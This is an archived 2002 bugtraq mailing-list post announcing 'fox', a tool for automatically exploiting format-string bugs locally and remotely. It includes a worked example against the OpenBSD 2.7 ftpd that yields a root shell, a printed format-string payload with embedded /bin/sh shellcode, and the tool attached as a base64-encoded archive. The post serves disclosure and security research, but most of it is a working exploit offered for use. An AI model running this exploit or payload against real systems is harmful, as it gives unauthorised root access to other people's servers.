[25170] in bugtraq
Re: Howto exploit a remote format bug automatically
daemon@ATHENA.MIT.EDU (Fredrik Widlund)
Fri Apr 19 14:51:18 2002
Message-Id: <200204191157.g3JBvrtc026085@wolf.defcom.com>
From: Fredrik Widlund <fredrik.widlund@defcom.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Apr 2002 12:57:52 +0100
In-Reply-To: <20020418162537.B20505@minimum.inria.fr>
MIME-Version: 1.0
Content-Type: Multipart/Mixed;
boundary="------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X"
--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Hi
"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms,
though it should be very straighforward.
The only requirement is that you get the actual printed string back to the
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.
Should work for exploiting bugs on most little-endian 32bit-machines like the
i386 providing you supply the shellcode.
Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.
Regards,
Fredrik Widlund
-x-
README for example 2:
Exploiting OpenBSD 2.7 ftp server
Input has to be < 256 characters, working offsets are -18 and -2
Ex:
root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment 0
chars before argument 111
chars before insert 0
argument offset 9
argument pointer offset 0
argument address 0xdfbfd15c
esp 0xdfbfd138
uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿
<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K
<83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª
<81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>
--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X
Content-Type: application/x-gzip;
name="fox0.1.tgz"
Content-Transfer-Encoding: base64
Content-Description: format bug exploiter
Content-Disposition: attachment; filename="fox0.1.tgz"
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
--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X--
